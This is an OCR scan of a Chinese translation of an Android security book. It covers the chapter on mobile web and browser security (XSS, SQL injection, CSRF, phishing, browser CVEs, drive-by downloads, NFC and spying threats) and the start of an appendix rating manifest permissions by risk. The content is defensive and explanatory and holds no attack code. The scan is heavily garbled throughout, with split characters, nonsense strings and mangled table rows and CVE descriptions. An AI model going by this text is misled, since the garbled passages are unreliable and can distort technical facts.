同 WAP 网 关 之 间 的 传输 使 用 WTLS 加 密 。 但 是 ， 这 些 传输 会 在 代理 /网 关 服 务 器 处 
终止 。 网 关 和 应 用 程序 /HTTP 服务 器 之 间 的 传输 则 使 用 TLS/SSL 进行 。 这 就 将 
WAP 1.0 的 传输 漏洞 暴露 给 了 MITM (Man-In- The- Middle， 中 间 人 ) 攻击 。 而且， 
从 WAP 网 关上 可 以 获得 各 种 敏感 的 信息 (这 些 信 息 以 明文 的 形式 存在 ) 。 这 就 意 
味 着 如 果 WAP 网 关 / 代 理 遭 到 破坏 ， 可 能 会 导致 严重 的 安全 漏洞 出 现 。 在 WAP 
2. 0 中 ， 这 一 问题 通过 WAP 2.0 提供 的 端 到 端 SSL/TLS 功能 支持 得 到 了 修复 。 

此 外 ，WAP 和 移动 HTML 网 站 还 容易 受到 典型 Web 应 用 程序 攻击 ， 包 括 跨 站 
点 点 脚本 攻击 、 SQL 注入 攻击 、 跨 站 点 伪造 请 求 攻击 和 网 络 钓鱼 。 ehe 

SED VER, CD AE— xi PAS E R Tf E HUC B) DI V, 25s TER RD D Vot 
HERE cookies, 脚本 (Script), AX flash 等 功能 。 这 就 意 6325. 
也 将 会 遭受 同 台式 机 /笔记 本 电脑 用 户 一 样 的 攻击 。 本 章 将 简要 介绍 这 些 攻击 ， 如 


请 求 一 一 ~ 网 关 


10.3 WAP 模型 
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果 读 者 想 要 了 解 更 多 有 关 这 些 攻击 的 详细 信息 ， 可 以 参考 OWASP (Open Web Ap- 
plication Security Project， 开 放 Web 应 用 程序 安全 项 目 ) 网 站 。 


10.1.1 跨 站 点 脚本 攻击 


跨 站 点 脚本 (Cross- Site Scripting, CSS/XSS) 能 够 在 Web 页 面 中 注入 客户 端 
脚本 ， 使 攻击 者 绕 过 访问 控制 机 制 。XSS 攻击 可 以 
使 攻击 者 获得 用 户 的 会 话 信 息 (例如 cookies) ， 随 
后 攻击 者 利用 这 些 信息 绕 过 访问 控制 机 制 。 图 10. 4 
所 示 为 使 用 Android. 浏览 器 访问 一 个 存在 漏洞 的 网 








站 ， 因 此 遭受 到 反射 型 XSS 攻击 的 例子 。 
XSS 攻击 的 实质 是 不 可 信用 户 的 输入 没有 经 过 — [ThePageatgoogle 


gruyere.appspot.com says: 


彻底 地 审查 和 消毒 / 转 义 。 在 XSS 攻击 的 情况 下 ， 
网 站 系统 没有 对 用 户 的 输入 进行 消毒 ， 因 此 导致 用 
户 输 入 要 么 在 浏览 器 中 回 显 ( 称 为 反射 型 XSS) ， 要 
么 被 存储 起 来 (持久 型 XSS) ， 留 到 以 后 被 查看 。 

和 一 般 的 网 站 一 样 ， 移 动 网 站 很 容易 遭 到 XSS 
攻击 。 因 为 移动 HTML 在 对 用 户 输入 验证 /消毒 方面 
所 做 的 控制 措施 更 少 。 如 果 能 够 像 处 理 一 般 网 站 屠 m 
样 处 理 移动 HTML， 对 用 户 的 输入 采用 恰当 的 验证 ， 图 10. 4 移动 设备 上 XSS 例子 
就 能 够 有 效 地 防止 移动 网 站 遭受 XSS 攻击 。 


10.1.2 SQL 注入 攻击 


SQL 注入 能 够 把 来 自 客 户 端的 SQL 查询 指令 注入 应 用 程序 。 一 次 成 功 的 SQL 
查询 (或 攻击 ) 可 以 将 敏感 的 数据 信息 提供 给 攻击 者 ， 使 攻击 者 绕 过 访问 控制 机 
制 ， 运 行 各 种 管理 操作 命令 ， 并 且 查 询 / 更 新 /删除 数据 库 数据 。 

SQL 注入 攻击 的 实质 是 没有 对 不 可 信用 户 的 输入 进行 验证 ， 直 接 将 这 些 输 入 用 
于 各 种 SQL 查询 ， 这 些 SQL 查询 命令 直接 面向 后 端 数据 库 进行 操作 。 

与 XSS 攻击 类 似 ， 移动 HTML 和 WAP 网 站 很 容易 遭受 SQL 注 和 攻击， 移动 网 
站 很 有 可 能 同 桌面 电脑 网 站 一 样 存在 相同 的 漏洞 ， 或 者 移动 网 站 的 问题 更 为 突出 。 
当 移 动 网 站 接收 用 户 输入 时 ， 移 动 网 站 可 能 并 没有 对 这 些 用 户 输入 进行 验证 。 因 
此 ， 对 于 这 一 问题 ， 使 用 参数 化 的 查询 或 存储 过 程 能 够 有 效 地 阻止 SQL 注入 攻击 
的 发 生 。 


10.1.3 跨 站 点 伪造 请 求 攻 击 


跨 站 点 伪造 请 求 ( Cross- Site Request Forgery, CSRF, XSRFE) 攻击 能 够 利用 已 
经 得 到 网 站 验证 的 用 户 ， 冒 用 其 身份 下 达 有 害 (未 授权 ) 的 命令 。 出 于 对 已 验证 
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用 户 的 信任 ， 网 站 不 会 怀疑 从 该 用 户 发 出 的 各 种 命令 。 在 CSRF 攻击 中 ， 网 站 是 对 
用 户 信 和 任 的 受害 者 ， 而 在 XSS 攻击 中 ,用 户 则 是 对 服务 器 /网 站 信任 的 受害 者 。 

在 移动 设备 上 ， 用 户 身 份 一 般 会 被 其 访问 的 多 个 网 站 验证 。 这 样 就 使 得 CSRF 
攻击 成 为 可 能 ， 就 像 他 们 在 台式 /笔记 本 电脑 上 面 的 情况 一 样 。 而 且 ，CSRF 攻击 
能 够 利用 较 小 的 界面 和 UI 布局 进行 伪装 〈 例 如 ， 伪 装 成 带 有 URL 链接 的 电子 邮 
件 ) ， 从 而 诱骗 用 户 在 网 站 上 执行 有 害 的 操作 。 


10.1.4 ”网络 钓鱼 


网 络 钓鱼 的 主要 攻击 目标 是 没有 戒心 的 用 户 ， 诱骗 他 们 提供 敏感 的 信息 ( 例 
如 ，SSN 、 密 码 ， 以 及 信用 卡号 等 ) 。 借 助 社 会 工程 化 的 手段 ， 攻 击 者 诱骗 用 户 进 
入 看 起 来 合法 的 网 站 执行 某 些 特定 的 操作 。 相 信 这 些 网 站 及 其 请 求 (典型 的 例子 
如 电子 邮件 里 的 请 求 链接 等 ) 的 用 户 会 执行 一 些 攻击 者 诱导 的 操作 ， 从 而 将 敏感 
信息 提供 给 了 攻击 者 。 

举例 来 说 ， 用 户 收 到 一 封 貌似 合法 的 电子 邮件 。 从 表面 上 来 看 ,该 电子 邮件 是 
从 和 用 户 有 业务 往来 的 银行 发 出 的 。 邮 件 声称 由 于 近期 银行 的 安全 漏洞 问题 ， 需 要 
用 户 更 改 他 的 银行 密码 。 出 于 方便 用 户 的 考虑 ， 邮 件 中 直接 给 用 户 提供 一 个 更 改 密 
码 的 URL 链接 。 只 要 点 击 这 个 链接 地 址 ， 用 户 就 会 进入 一 个 网 站 ， 该 网 站 看 起 来 
同 银行 网 站 非常 地 相似 。 于 是 ， 用 户 会 不 加 怀疑 地 完成 密码 重 置 操作 。 然 而 ， 结 果 
却 将 其 当前 的 密码 提供 给 了 攻击 者 。 

对 于 用 户 来 说 ， 在 移动 设备 上 识别 这 样 的 攻击 显得 更 加 困难 。 因 为 移动 设备 上 
的 UI 显示 布局 较 小 ， 用 户 不 能 认真 地 阅读 所 示 的 完整 URL 链接 信息 。 如 果 这 些 链 
接 重 定向 到 某 个 网 站 ,那么 在 移动 设备 上 ， 用 户 将 很 难 从 这 些 URL 链接 信息 上 识 
别 出 来 。 在 移动 设备 上 ， 较 小 的 U 屏 幕布 局 显示 使 用 户 很 难 分 辩 合 法 网 站 和 假冒 
网 站 之 间 的 区 别 。 如 果 URL 经 过 伪装 (例如 ， 将 链接 地 址 以 特别 小 的 URL 形式 显 
示 ) 或 是 将 URL 隐藏 在 接收 的 短信 里 (通过 在 短信 中 包含 极 小 的 URL), WALE 
法 网 站 和 假冒 网 站 的 区 分 就 会 变 得 更 加 困难 。 很 多 用 户 (其 至 是 对 这 种 攻击 有 一 
定 了 解 的 用 户 ) 有 被 这 类 攻击 诱骗 的 经 历 。 正 如 在 前 一 章 所 提 到 的 ，QR (Quick 
Response, IREM) 码 也 可 以 被 用 来 实施 这 类 攻击 。 

















































































































10.2 移动 浏览 器 安全 

本 节 将 回顾 近期 Android 平台 上 的 浏览 器 漏洞 ， 以 及 隐藏 强迫 下 载 式 攻击 
问题 。 
10.2.1 浏览 器 漏洞 

到 本 章 编写 时 为 止 , 已 经 有 大 约 200 多 个 与 Android 平台 相关 的 常见 漏洞 和 暴 





第 10 章 浏览 器 安全 与 未 来 威胁 格局 153 





露 问题 (Common Vulnerabilities and Exposures, CVE) 被 收录 到 了 CVE 的 数据 库 中 
(用 户 可 在 cve. mitre. org 网 站 上 搜索 关键 词 “android” 查 看 这 些 漏洞 )。 这 些 CVE 
很 多 都 是 与 浏览 器 相关 的 漏洞 ， 包 括 系统 内 置 的 浏览 器 ， 以 及 网 络 上 可 供 下 载 的 浏 
览 器 ， 例 如 火狐 (Firefox) 浏览 器 。 表 10. 2 主要 介绍 了 下 述 几 种 CVE 及 其 相应 的 
说 明 (详细 说 明 请 参考 NIST 网 站 介绍 2) : CVE 2008-7298, CVE 2010-1807, CVE 
2010-4804, CVE 2011-2357 和 CVE 2012-3979, 





3€ 10.2 Android 设备 上 与 浏览 器 有 关 的 漏洞 示例 弓 


Wo i 说 Hj 








Android 系统 内 置 的 Android 浏览 器 无 法 恰当 地 限制 HTTPS iri cookies 被 算 改 的 
行为 ， 导 致 攻击 者 能 够 通过 中 间 人 攻击 ， 利 用 HTTP 响应 报 文 的 Set- Cookie 头 部 字 
段 ， 重 写 或 删除 任意 的 cookies 信息 。 该 漏洞 的 产生 由 于 没有 使 用 强制 安全 传输 技术 
( Http Strict Transport Security，HSTS ) 





CVE 2008- 7298 


















































该 漏洞 存在 于 苹果 公司 的 4. 1. 2 版 本 之 前 的 4.x 系列 版 本 和 5.0.2 版 本 之 前 的 5.x 
系列 版 本 的 Safari 浏览 器 中 ，Google 公司 的 Android 2. 2 版 本 之 前 的 Android 系统 ， 以 
CVE 2010-1807 ”| 及 1.2.6 版 本 之 前 的 webkitgtk 模块 中 。 该 漏洞 导致 无 法 正确 地 对 浮 点 数据 进行 验证 ， 
使 得 远程 攻击 者 能 够 执行 任意 代码 ， 或 是 借助 专门 编写 的 HTML 文档 制造 拒绝 服务 
(应 用 程序 崩溃 ) 攻击 ， 这 些 问 题 都 与 没有 使 用 标准 的 NaN 表示 法 有 关 

















远程 攻击 者 能 够 借助 Android 2. 3.4 版 本 之 前 的 Android. 系统 内 置 的 浏览 器 com/ 
CVE 2010-4804 android/browser/ 路径 下 的 BrowserActivity. java 和 BrowserSettings. java 文件 ， 使 用 特定 
的 语句 “content: //URI" $il& SD 卡 内 的 文件 

















在 Android 2. 3. 4 和 Android 3. 1 版 本 的 浏览 器 URL 加 载 功能 中 存在 跨 应 用 程序 脚本 
漏洞 ， 该 漏洞 能 够 使 本 地 应 用 程序 绕 过 沙 箱 机 制 ， 在 任意 操作 域 (Domain) 中 执行 








































































































任意 的 JavaScript 脚本 。 攻 击 者 利用 该 漏洞 的 方式 有 两 种 ，@DMAX_TAB 参数 设置 了 

CVE2011-2357 “| 浏览 器 可 以 同时 打开 的 最 多 标签 数 ， 使 用 浏览 器 一 次 性 同时 打开 所 有 的 标签 ， 然 后 
将 指向 特定 目标 域 的 URI 加 载 到 当前 标签 页 的 地 址 栏 内 。@@ 同 时 调用 两 次 startActivity 
函数 ， 先 是 使 用 了 目标 域 的 URI， 随 即 又 使 用 了 恶意 JavaScript 脚本 ， 而 将 焦点 仍 放 
置 在 启动 的 目标 域 的 Activity 上 





























15. 0 版 本 之 前 的 Android 火狐 浏览 器 没有 正确 地 调用 — android log print 函数 ， 在 
CVE2012-3979 “| 浏览 器 程序 中 存在 远程 控制 代码 执行 漏洞 ， 致 使 攻击 者 能 够 在 远 端 通过 利用 Java 
Script 转 储 函数 的 特制 网 页 ， 在 受 影响 的 应 用 程序 中 利用 此 漏洞 执行 任意 的 代码 









































CVE 2008-7298 漏洞 可 以 被 攻击 者 用 来 算 改 或 删除 cookies; CVE 2010-1807 W 
洞 可 以 被 攻击 者 用 来 执行 任意 代码 或 造成 应 用 程序 崩溃 ，CVE 2010-4804 漏洞 可 以 














© NIST (National Institute of Standards and Technology， 美 国 国家 标准 与 技术 研究 院 ) NIST 有 关 CVE 的 
说 明 参 见 网 站 http; //web. nvd. nist. gov/view/vuln/detail? vulnld = CVE。 一 一 原 书 注 

马 “ 表 格 内 容 源 于 网 站 http: //web. nvd. nist. gov/view/vuln/detail? vulnld = CVE， 漏 洞 说 明 来 自 国 家 漏洞 
数据 库 ( National Vulnerability Database, NVD) 。 一 一 原 书 注 
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导致 SD 卡 上 存储 的 信息 泄露 ， CVE 2011-2357 漏洞 能 够 导致 XSS 攻击 ; CVE 2012- 
3979 漏洞 能 够 导致 特定 代码 被 执行 。 和 普通 计算 机 的 浏览 器 漏洞 相 比 ， 可 以 发 现 
移动 浏览 器 的 漏洞 和 普通 计算 机 浏览 需 的 漏洞 具有 相同 的 特点 。 通 党 ， 如 果 移 动 应 
用 程序 的 开发 没有 按照 既定 的 安全 开发 周期 ( Security Development Lifecycle, SDL) 
的 流程 进行 。 而 且 ， 如 果 开 发 者 错误 地 认为 SDL 流程 可 有 可 无 或 同 移动 应 用 程序 
的 开发 关系 不 大 ， 就 会 导致 程序 开发 人 员 在 开发 过 程 中 忽略 很 多 安全 控制 手段 
(例如 ， 威 胁 建 模 、 静 态 分 析 和 动态 分 析 、 渗 透 测 试 ， 以 及 代码 审查 等 ) ， 从 而 使 
它们 没有 被 应 用 在 移动 应 用 程序 的 开发 过 程 中 。 

隐蔽 强迫 下 载 

对 于 普通 计算 机 来 说 ， 隐 蔽 强迫 下 载 的 问题 已 经 存在 了 很 长 时 间 了 。 然 而 ， 如 
今 这 类 问题 已 经 开始 出 现在 移动 设备 上 ， 成 为 一 种 新 兴 的 移动 设备 安全 威胁 方式 。 
基本 上 ， 隐 项 强迫 下 载 的 软件 都 是 一 些 恶意 软件 。 当 用 户 访问 受 感 染 的 网 站 时 ， 这 
些 软件 会 在 后 台 自 动 下 载 ， 并 且 通 常会 自行 安装 。 

最 近 ， 本 书 作 者 看 到 了 第 一 个 Android 系统 上 的 隐蔽 强迫 下 载 的 恶意 软件 (这 
款 恶 意 软件 的 名 字 是 “NonCompatible”) 。 当 访问 受 感染 的 网 站 时 ,浏览 器 会 自行 
下 载 这 款 恶 意 软 件 。 但 是 ， 如 果 没 有 用 户 的 操作 配合 ， 下 载 的 这 款 软件 是 不 能 自行 
安 闭 的。 而且， 安装 从 不 可 靠 来 源 获 得 的 软件 ， 首 先 需 要 用 户 开 局“ 人 允许 安装 其 
他 源 软 件 ” 设 置 ， 然 后 得 到 用 户 的 安装 许可 ， 才 能 将 软件 安装 在 系统 上 。 所 以 攻 
击 者 通常 对 这 类 软件 的 下 载 进 行 伪装 ， 将 其 命名 为 某 个 流行 的 Android 应 用 程序 或 
Android 系统 的 更 新 。 用 户 往往 出 于 主动 意愿 下 载 并 安装 这 类 文件 ， 而 在 这 个 过 程 
中 并 没有 过 多 地 考虑 安全 问题 ， 因 此 导致 用 户 的 设备 被 恶意 软件 感染 。 

不 过 ， 只 要 禁用 Side-loading。 应 用 程序 安装 方式 ， 以 及 取消 安装 来 自 不 可 靠 源 
的 应 用 程序 的 功能 设置 ，Android 设备 就 基本 不 会 遭受 到 这 类 恶意 软件 的 影响 了 。 


10.3 ”未 来 移动 设备 威胁 发 展 格局 








到 此 ， 本 章 已 经 介绍 了 各 种 被 广泛 利用 的 漏洞 ， 以 及 在 今天 仍然 能 够 被 利用 的 
漏洞 。 本 节 将 主要 讨论 在 不 久 的 将 来 Android 设备 上 可 能 出 现 的 各 种 新 的 攻击 形 
式 。 不 过 ， 需 要 注意 的 是 ， 对 于 这 些 新 的 攻击 形式 ， 非 专业 人 员 将 无 法 实施 ， 只 
有 组 织 的 犯罪 集团 、 国 家 和 情报 机 构 通过 完善 的 计划 、 可 靠 的 执行 ， 以 及 充分 的 资 
源 配 置 供给 ， 才 能 实施 这 些 攻 击 。 虽 然 本 节 所 讲 的 这 些 新 型 的 攻击 形式 看 似 仅 可 能 














O ”隐蔽 强迫 下 载 (Drive-by Downloads) ， 即 应 用 软件 隐藏 在 网 页 中 ， 用 户 在 浏览 网 页 时 会 在 不 知情 的 情 
况 下 ， 自 动 下 载 安装 间谍 软件 等 恶意 程序 。 一 一 原 书 注 

©  Side-loading, {KE Android 设备 上 直接 使 用 APK 格式 的 应 用 程序 文件 安装 应 用 程序 ， 这 些 APK 格式 
的 应 用 程序 文件 通常 从 其 他 网 站 上 获得 ， 而 不 是 从 Google Play 商店 下 载 。 一 一 译 者 注 
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出 现在 遥远 的 将 来 ， 但 在 如 今 的 现实 生活 中 ， 它 们 也 是 有 可 能 发 生 的 ， 甚 至 不 久 以 
后 ， 这 类 攻击 形式 发 生 的 可 能 性 会 更 大 。 在 本 节 中 ， 主 要 列举 了 下 述 几 种 威胁 信息 
安全 的 攻击 形式 : 将 手机 用 作 间 谍 / 跟 踪 设 备 、 通 过 移动 设备 操纵 企业 网 络 和 其 他 
设备 ， 以 及 利用 移动 设备 近 场 通信 (Near Field Communication, NFC) 的 功能 。 


10.3.1 手机 变 身 间谍 /跟踪 装置 


设想 一 下 ， 利 用 Android 设备 或 应 用 程序 上 的 漏洞 ， 实 现 对 移动 电话 的 完全 操 
控 。root 处 理 后 的 Android 移动 电话 最 容易 受到 这 类 攻击 ， 将 移动 电话 变 成 跟踪 和 
间谍 装置 。 请 考虑 一 下 ， 移 动 电话 上 可 能 被 攻击 者 利用 的 功能 有 : 照相 机 和 上 照片、 
GPS 坐标 、 内 置 话 简 、 电 子 邮 件 、 聊 天 信息 、 社 交 媒体 信息 (餐馆 位 置 、 名 胜 古 
迹 ) 、 治 疗 信息 〈 例 如 ， 去 过 的 医院 或 诊所 、 查 找 或 看 过 的 医生 ) ， 以 及 通过 设备 
查找 的 药品 等 。 
智能 手机 可 以 作为 最 好 的 跟踪 /间谍 设备 ， 因 为 它 可 以 提供 用 户 和 其 身边 人 们 日 
常 工作 生活 中 的 每 一 件 细 小 的 信息 ， 从 而 实现 收集 信息 的 目的 。 没 有 意识 到 这 类 危害 
的 用 户 ， 会 像 往 常 一 样 很 自然 地 随身 携带 他 们 的 智能 手机 。 同 样 ， 将 手机 用 作 跟踪 / 
间谍 装置 的 恶意 用 户 也 是 如 此 ， 以 便 时 刻 窃取 跟踪 目标 的 信息 。 对 于 有 组 织 的 犯罪 、 
罪犯 、 恐 怖 分 子 ， 以 及 执法 机 构 来 说 ， 智 能 手机 是 非常 适合 的 跟踪 /间谍 设备 。 鉴 于 
人 们 会 使 用 这 些 智能 移动 设备 完成 各 种 事务 ， 所 以 这 些 设备 同样 也 成 为 了 重要 的 执 
法 工具 〈 例 如 ， 通 过 检查 这 些 设备 收集 使 用 者 的 犯罪 证 据 ) 。 所 有 的 这 一 切 都 应 当 
引起 一 般 用 户 的 注意 ， 从 而 尽量 提升 对 智能 手机 的 安全 和 隐私 问题 的 重视 程度 。 


10.3.2 通过 移动 设备 操纵 企业 网 络 与 设备 


移动 应 用 程序 或 Android 平台 本 身 的 漏洞 ， 还 会 导致 一 些 其 他 安全 问题 的 出 
现 。 除 了 作为 刺探 企业 的 间谍 工具 外 ， 攻 击 者 还 可 以 使 用 智能 设备 发 起 各 种 针对 企 
业 资 源 的 攻击 ， 乃 至 控制 企业 的 信息 系统 。 

如 第 9 章 介 绍 的 情况 ， 实 际 上 企业 并 没有 对 企业 购买 的 和 用 户 自 带 的 Android 
设备 进行 管控 。 大 多 数 公司 没有 规定 将 这 些 设备 的 使 用 限定 在 特定 的 范围 或 区 域 。 
并 且 ， 自 带 设 备 (Bring Your Own Device, BYOD) 上 的 应 用 程序 和 系统 平台 的 漏 
洞 修 补 也 不 是 企业 安全 管理 人 员 需 要 实施 管控 的 工作 范畴 。 所 有 的 这 一 切 导致 企业 
环境 中 的 资源 信息 存在 着 严重 的 安全 隐患 。 事 实 上 ， 这 些 设备 超出 了 一 般 的 安全 管 
控 措 施 〈 例 如 ， 安 全 扫描 、 漏 洞 修 补 、 应 急 响 应 2 ) 的 监管 范围 ， 因 而 增加 了 安全 
















































































名” 应急 响 应 〈Jncident Response, IR) ， 也 称 事件 响应 ， 企 业 信息 化 管理 范畴 概念 。 通 常 是 指 企业 安全 

人 员 在 遇 到 突 发 事件 后 所 采取 的 措施 和 行动 。 对 网 络 来 说 ,“ 突 发 事件 ”是 指 影响 一 个 系统 正常 工作 
的 情况 ， 这 里 的 系统 包括 主机 范畴 内 的 问题 ， 也 包括 网 络 范畴 内 的 问题 ， 这 种 “情况 ”包括 常见 的 
黑客 入 侵 、 信 息 窃取 等 ， 也 包括 拒绝 服务 攻击 、 网 络 流量 异常 等 。 一 一 译 者 注 
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风险 。root 处 理 后 的 设备 不 仅 使 用 户 有 可 能 遭受 到 安全 攻击 ， 还 会 将 用 户 所 处 的 环 
境 暴露 在 各 种 安全 攻击 之 下 。 随 着 Android 系统 上 各 种 应 用 程序 的 出 现 (例如 ， 
Wireshark 软件 ) ， 编 写 特定 的 应 用 程序 发 起 安全 攻击 ， 在 现实 生活 中 是 很 有 可 能 发 
生 的 。 可 以 想象 ， 安 全 人 员 在 其 所 处 环境 中 处 理 这 些 设备 和 问题 时 可 能 面临 的 各 种 
棘手 局 面 。 换 一 种 场景 来 说 ， 越 来 越 多 的 家 电 用 品 和 系统 可 以 通过 移动 设备 来 控 
制 。 因 此 ， 攻 击 者 很 容易 利用 这 些 存 在 漏洞 或 易 被 攻击 的 Android 设备 对 这 些 家 电 
产品 和 设备 发 起 各 种 攻击 。 


10.3.3 移动 钱包 与 NFC 


本 书 在 第 7 章 已 经 简要 地 介绍 了 NFC 技术 ， 并且 讨 论 了 Google RE (Google 
Wallet). 存在 的 漏洞 。 逐 渐 地 ， 越 来 越 多 的 零售 商 和 银行 开始 着 眼 于 将 NFC 技术 用 
于 移动 支付 业务 。 虽 然 这 种 尝试 还 处 于 起 步 阶 段 ， 但 人 们 对 将 NFC 用 于 移动 钱包 
功能 可 能 存在 的 隐私 和 安全 问题 的 担忧 也 随 之 出 现 。 除 了 对 围绕 NFC 应 用 程序 安 
全 性 的 担忧 外 ，NFC 技术 还 存在 一 些 其 他 的 安全 问题 ， 例 如 窃听 、 拦 截 和 丧失 控 
制 。 从 本 质 上 来 说 ，NFC 是 一 种 无 线 通 信 技 术 。 因 此 ,在 NFC 信和 号 覆盖 范围 内 窃 
听 通 信 并 非 没 有 可 能 。 同 射频 识别 ( Radio- Frequency Identification, RFID) 技术 相 
E, NFC 技术 对 通信 的 覆盖 范围 进行 了 限制 ， 尽 管 可 以 使 用 天 线 对 信号 进行 放大 ， 
延伸 其 通信 和 范围。 假设 通信 安全 得 到 保障 ( 如 对 通信 数据 实施 加 密 )， 但 攻击 者 仍 
然 可 以 利用 相关 数据 包 分 析 工 具 ， 对 NFC 通信 中 传输 的 数据 进行 分 析 。 男 一 个 问 
题 是 ， 如 果 手 机 丢失 或 被 盗 ,用 户 的 银行 信息 和 信用 卡 信息 (还 包括 公司 的 企业 
卡 信息 ) 很 可 能 会 面临 风险 。 虽 然 用 户 可 能 很 想 使 用 这 些 基 于 NFC 技术 的 功能 ， 
但 通常 用 户 可 能 并 不 了 解 基 于 该 技术 的 各 项 功能 存在 的 风险 ,而且 用 户 往往 也 不 愿 
意 遵从 最 佳 的 安全 操作 方法 ， 从 而 为 移动 设备 信息 安全 埋 下 隐患 。 

NFC 技术 不 仅 可 以 用 在 移动 支付 上 ， 还 可 以 用 于 短 距离 信息 快捷 传输 。 近 期 ， 
三 星 公 司 发 布 了 一 款 Galaxy S 亚 智能 手机 ， 使 用 NFC 作为 信息 传输 技术 ， 实 现 设备 
间 信 息 内 容 的 无 颖 传输 。 用 户 只 需 将 两 部 设备 背 对 背 接触 ， 即 可 实现 设备 间 信 息 内 
容 的 无 颖 便捷 传输 。 虽 然 该 功能 拥有 相当 优秀 的 用 户 体验 ， 但 却 存 在 一 定 的 安全 隐 
患 。 例 如 ， 数 据 安全 等 问题 。 设 想 一 下 ， 利 用 这 一 功能 ,数据 有 可 能 直接 被 传输 到 
安全 管理 员 管控 之 外 的 设备 上 ， 造 成 信息 泄露 。 






























































10.4 人 小结 


本 章 主 要 讨论 了 移动 HTML 的 安全 问题 和 WAP 的 安全 问题 ， 介 绍 了 移动 网 站 
上 可 能 发 生 的 一 些 典 型 的 安全 攻击 。 简 要 地 分 析 了 部 分 浏览 器 漏洞 和 隐蔽 强迫 下 载 
的 问题 。 最 后 ， 介 绍 了 几 种 基于 移动 设备 的 高 级 别 安全 攻击 形式 。 





附 x 


附录 A Manifest 权限 


在 第 4 章 ， 我 们 已 经 讨论 了 Manifest 权限 。 应 用 程序 请 求 这 些 权 限 用 于 执行 诸 
如 互联 网 访问 、 发 送 SMS 信息 等 特定 的 操作 。 我 们 根据 安全 风险 的 程度 对 这 些 权 
限 做 出 了 评级 。 发 送 SMS 短信 息 或 安装 软件 包 的 权限 ， 在 安全 风险 的 程度 (严重 
性 ) 上 高 于 访问 电池 使 用 量 统计 数据 的 权限 。 下 表 展 示 了 针对 不 同 严重 性 /风险 等 
级 设 定 的 分 值 。 

















分 值 描述 /风险 
4 严重 风险 等 级 
3 高 风险 等 级 
2 中 等 风险 等 级 
1 信息 披露 等 级 








表 A.1 列 出 了 所 有 的 Manifest 权限 ， 对 应 的 说 明 ， 以 及 相应 的 风险 等 级 。 


表 A.1 Manifest 权限 



































































































































权限 名 称 说 明 介 绍 风险 等 级 
允许 读 写 访问 checkin (登记 ) 数据 库 的 
ACCESS_CHECKIN_PROPERTIES 2 
“properties (属性 )” 表 ， 更 新 属性 值 
Ce COARSE On 允许 应 用 程序 通过 基站 、Wi- Fi 等 网 络 位 置 源 
liic is 获取 粗略 的 位 置信 息 
允许 应 用 程序 通过 GPS， 基 站 和 Wi-Fi 等 位 置 
ACCESS_FINE_LOCATION a 2 
源 获取 精确 的 位 置信 息 
允许 应 用 程序 访问 额外 的 位 置 提供 者 (Tocation 
ACCESS_LOCATION_EXTRA_COMMANDS 2 
Provider) 指令 
允许 应 用 程序 创建 模拟 位 置 提供 者 ( Location 
ACCESS_MOCK_LOCATION E 1 
Provider) 进行 测试 
ACCESS_NETWORK_STATE 允许 应 用 程序 访问 网 络 状态 信息 1 
许 应 用 程序 使 用 SurfaceFlingerO 的 底 
ACCESS, SURFACE, FLINGER F ugi 程序 使 用 SurfaceFlinger O 的 底层 特性 1 
J HE 

















©  SurfaceFlinger, Android 平台 上 底层 的 图 形 显 示 支 持 ， 一 般 月 
屏幕 截图 。 一 一 译 者 注 





an 
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于 游戏 或 照相 机 预览 界面 和 底层 模式 的 
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( 续 ) 
权限 名 称 说 明 介 绍 风险 等 级 
ACCESS_WIFI_STATE 允许 应 用 程序 访问 Wi- Fi 网 络 状态 信息 1 
人 允许 应 用 程序 调用 账户 身份 验证 器 ( Account 
ACCOUNT. MANAGER 4 
AuthenticatorO ) 
ADD. VOICEMAIL 允许 应 用 程序 向 系统 申请 发 送 语音 邮件 3 
允许 应 用 程序 承担 账户 身份 验证 器 功能 ， 进 行 
AUTHENTICATE_ACCOUNTS 4 
账户 管理 
BATTERY. STATS 允许 应 用 程序 收集 电池 电量 统计 信息 1 
该 权限 只 限 Accessi ilityService 民 务 申请 ， 以 确 
BIND_ACCESSIBILITY_SERVICE We MES 1 
保 只 有 系统 才能 与 之 绑 定 
允许 应 用 程序 告诉 appWidget 服务 ( Service ) 
BIND_APPWIDGET 哪 一 个 应 用 程序 能 够 访问 appWidget (小 插件 ) 1 
的 数据 
该 权限 只 限 设 备 管理 员 Receiver 请 求 ， 以 确保 
BIND_DEVICE_ADMIN ee MCN, 2 
只 有 系统 才能 与 其 交互 
只 限 InputMethodService 服务 请 求 ， 以 确保 只 有 
BIND_INPUT_METHOD S HMM 1 
系统 才能 同 它 绑 定 
只 限 RemoteViewsService 服务 请 求 ， 以 确保 只 有 
BIND_REMOTEVIEWS i 1 
系统 才能 同 它 绑 定 
BIND TEXT. SERVICE 只 限 TextService 服务 请 求 1 
只 限 VpnService 服务 请 求 ， 以 确 保 只 有 系统 才 
BIND_VPN_SERVICE MADE 2 
能 同 它 绑 定 
只 限 WallpaperService 服务 请 求 $ 以 确保 只 有 系 
BIND_WALLPAPER Sd dd 1 
统 才 能 同 它 绑 定 
BLUETOOTH 允许 应 用 程序 连接 配对 完成 的 蓝牙 设备 2 
BLUETOOTH_ADMIN 允许 程序 进行 发 现 新 的 蓝牙 设备 并 与 之 配对 2 
BRICK 于 请 求 禁用 设备 (非常 危险 !) 3 
允许 应 用 程序 广播 软件 已 被 卸载 的 事件 通知 
BROADCAST. PACKAGE REMOVED 2 
( Notification) 
BROADCAST SMS 允许 应 用 程序 广播 收 到 SMS 短信 息 的 事件 通知 3 
允许 应 用 程序 广播 与 Intent 相连 的 消息 (Sticky 
BROADCAST. STICKY id 2 
ntent 











©  AccountAuthenticator, IK 
级 进程 才能 访问 的 权限 。 一 一 译 者 注 














户 身份 验证 器 ， 用 于 获取 账 














户 验 证 信息 ， 主 要 为 Gmail 账户 信息 ， 只 有 系统 
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(5E) 
权限 名 称 说 明 介 绍 风险 等 级 
允许 应 用 程序 广播 收 到 WAP PUSH 服务 的 事件 
BROADCAST WAP. PUSH | 2 
通知 
允许 应 用 程序 绕 过 系统 提供 的 用 户 拨号 界面 进 
CALL_PHONE i . 4 
行 拨号 呼叫 ， 无 需 用 户 的 确认 
允许 应 用 程序 绕 过 系统 提供 的 用 户 拨号 界面 呼 
CALL PRIVILEGED . " 4 
叫 任 意 电话 号 码 ， 包 括 紧急 电话 ， 无 需 用 户 确认 
CAMERA 于 请 求 访问 照相 机 设备 4 
CHANGE . COMPONENT . ENABLED | 允许 应 用 程序 更 改 其 他 应 用 程序 组 件 的 启 i 
_STATE 状态 
CHANGE_CONFIGURATION 允许 应 用 程序 修改 当前 配置 ， 如 地 区 位 置 1 
